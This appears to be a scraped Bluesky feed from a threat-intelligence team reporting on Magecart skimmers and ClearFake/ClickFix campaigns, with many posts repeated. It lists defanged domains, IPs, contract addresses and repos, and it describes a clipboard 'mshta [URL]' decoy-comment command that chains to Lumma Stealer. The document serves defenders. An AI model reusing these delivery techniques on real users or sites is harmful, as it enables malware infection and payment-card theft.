ThreatCat.ch
@threatcat-ch.bsky.social
ThreatCat.ch has been founded in the autumn 2022 and consists of a bunch of experienced Cyber Threat Analysts and Incident Responders who have been working together for many years.
Decoding gives us another WebSocket based communication channel: wss://cdn[.]iconstaff[.]top/common?source=
Domain iconstaff[.]top was already reported as being Magecart related in June 2024: blog.sucuri.net/2024/06/caes...
Domain iconstaff[.]top was already reported as being Magecart related in June 2024: blog.sucuri.net/2024/06/caes...
Decoding the Caesar Cipher Skimmer
Discover the latest credit card skimming threat, the "Caesar Cipher Skimmer," affecting multiple CMS platforms like WordPress and Magento. Learn how it works and get essential tips to protect your eco...
blog.sucuri.net
February 28, 2025 at 4:21 PM
Decoding gives us another WebSocket based communication channel: wss://cdn[.]iconstaff[.]top/common?source=
Domain iconstaff[.]top was already reported as being Magecart related in June 2024: blog.sucuri.net/2024/06/caes...
Domain iconstaff[.]top was already reported as being Magecart related in June 2024: blog.sucuri.net/2024/06/caes...
Let’s take transaction 0x863f7[…] at Sep-02-2024 02:34:55 PM UTC – we get the following decoded JS:
testnet.bscscan.com/tx/0x863f748...
testnet.bscscan.com/tx/0x863f748...
February 28, 2025 at 4:21 PM
Let’s take transaction 0x863f7[…] at Sep-02-2024 02:34:55 PM UTC – we get the following decoded JS:
testnet.bscscan.com/tx/0x863f748...
testnet.bscscan.com/tx/0x863f748...
Another confirmation of the malicious, Magecart related activity, can be found by analyzing other activities from the main BSC testnet contract 0x5178a932d5b312801e02c43fd50399a88028b9d0
testnet.bscscan.com/address/0x51...
testnet.bscscan.com/address/0x51...
February 28, 2025 at 4:21 PM
Another confirmation of the malicious, Magecart related activity, can be found by analyzing other activities from the main BSC testnet contract 0x5178a932d5b312801e02c43fd50399a88028b9d0
testnet.bscscan.com/address/0x51...
testnet.bscscan.com/address/0x51...
This assumption is reinforced when we get a further obfuscated payload from suckerity[.]xyz when visiting the checkout page & subsequently noticing a client to server data exfiltration after having entered credit card details (small extract of the ~200KB deobfuscated code)
February 28, 2025 at 4:21 PM
This assumption is reinforced when we get a further obfuscated payload from suckerity[.]xyz when visiting the checkout page & subsequently noticing a client to server data exfiltration after having entered credit card details (small extract of the ~200KB deobfuscated code)
The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare), not related to #ClearFake, but reminds us #Magecart related injections:
February 28, 2025 at 4:21 PM
The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare), not related to #ClearFake, but reminds us #Magecart related injections:
While investigating an infected website, we noticed call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95 : testnet.bscscan.com/address/0x09...
testnet.bscscan.com
February 28, 2025 at 4:21 PM
While investigating an infected website, we noticed call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95 : testnet.bscscan.com/address/0x09...
Nice writeup of Atea's findings regarding this: www.atea.no/siste-nytt/i...
Investigating a ClearFake/ClickFix + Etherhide campaign
We have identified and tracked a new campaign utilizing ClearFake and EtherHiding technique. This infects legitimate websites resulting in information stealer.
www.atea.no
January 11, 2025 at 3:26 PM
Nice writeup of Atea's findings regarding this: www.atea.no/siste-nytt/i...
By the way, Google based malvertisement is still going strong – also delivering #Lumma / #LummaStealer currently from hXXps://sites.google[.]com/view/gglchor then chrome.downloading[.]icu
January 7, 2025 at 6:33 AM
By the way, Google based malvertisement is still going strong – also delivering #Lumma / #LummaStealer currently from hXXps://sites.google[.]com/view/gglchor then chrome.downloading[.]icu
The command it copies in the clipboard has the following string structure:
mshta [URL] # Decoy comment to look genuine to the user and hide the previous commands in the Run prompt
This command starts a long chain of Powershell commands leading finally to #LummaStealer
mshta [URL] # Decoy comment to look genuine to the user and hide the previous commands in the Run prompt
This command starts a long chain of Powershell commands leading finally to #LummaStealer
January 6, 2025 at 8:51 PM
The command it copies in the clipboard has the following string structure:
mshta [URL] # Decoy comment to look genuine to the user and hide the previous commands in the Run prompt
This command starts a long chain of Powershell commands leading finally to #LummaStealer
mshta [URL] # Decoy comment to look genuine to the user and hide the previous commands in the Run prompt
This command starts a long chain of Powershell commands leading finally to #LummaStealer
The infection hides as a base64 encoded & obfuscated Javascript directly on the home page. It gets the overlay from a smart contract and injects it into the HTML.
January 6, 2025 at 8:51 PM
The infection hides as a base64 encoded & obfuscated Javascript directly on the home page. It gets the overlay from a smart contract and injects it into the HTML.
Another related github repo: github.com/AlexanderRPa... involving domain streammain[.]top hosted on 89.169.13[.]147 . All identified github repos were reported.
GitHub - AlexanderRPatton/cdn
Contribute to AlexanderRPatton/cdn development by creating an account on GitHub.
github.com
September 30, 2024 at 3:28 PM
Another related github repo: github.com/AlexanderRPa... involving domain streammain[.]top hosted on 89.169.13[.]147 . All identified github repos were reported.
Investigating further, we find yet another github repository gavnoman/gootraf which is gone, but seems to have redirected users toward awardbonus[.]shop at 147.45.197[.]80
September 30, 2024 at 2:29 PM
Investigating further, we find yet another github repository gavnoman/gootraf which is gone, but seems to have redirected users toward awardbonus[.]shop at 147.45.197[.]80
This domain points toward yet another github account started on July 2nd, 2024 -
github.com/lolngnos/loles . Both domains currently resolve to 77.221.155[.]81 (alias painful-underwear.aeza[.]network (!) hosted at AEZA).
github.com/lolngnos/loles . Both domains currently resolve to 77.221.155[.]81 (alias painful-underwear.aeza[.]network (!) hosted at AEZA).
GitHub - lolngnos/loles
Contribute to lolngnos/loles development by creating an account on GitHub.
github.com
September 30, 2024 at 2:29 PM
This domain points toward yet another github account started on July 2nd, 2024 -
github.com/lolngnos/loles . Both domains currently resolve to 77.221.155[.]81 (alias painful-underwear.aeza[.]network (!) hosted at AEZA).
github.com/lolngnos/loles . Both domains currently resolve to 77.221.155[.]81 (alias painful-underwear.aeza[.]network (!) hosted at AEZA).
A closer look into bitbucket.org/goo2/adss/sr... reveals domain support-wp[.]shop in the commit log
September 30, 2024 at 2:29 PM
A closer look into bitbucket.org/goo2/adss/sr... reveals domain support-wp[.]shop in the commit log
3. In Javascript files, with a reference to a github repository with a very similar code
September 30, 2024 at 2:29 PM
3. In Javascript files, with a reference to a github repository with a very similar code
2. In JavaScript files, with a reference to a bitbucket repository
September 30, 2024 at 2:29 PM
2. In JavaScript files, with a reference to a bitbucket repository
1. Directly into the page’s HTML at the top
September 30, 2024 at 2:28 PM
1. Directly into the page’s HTML at the top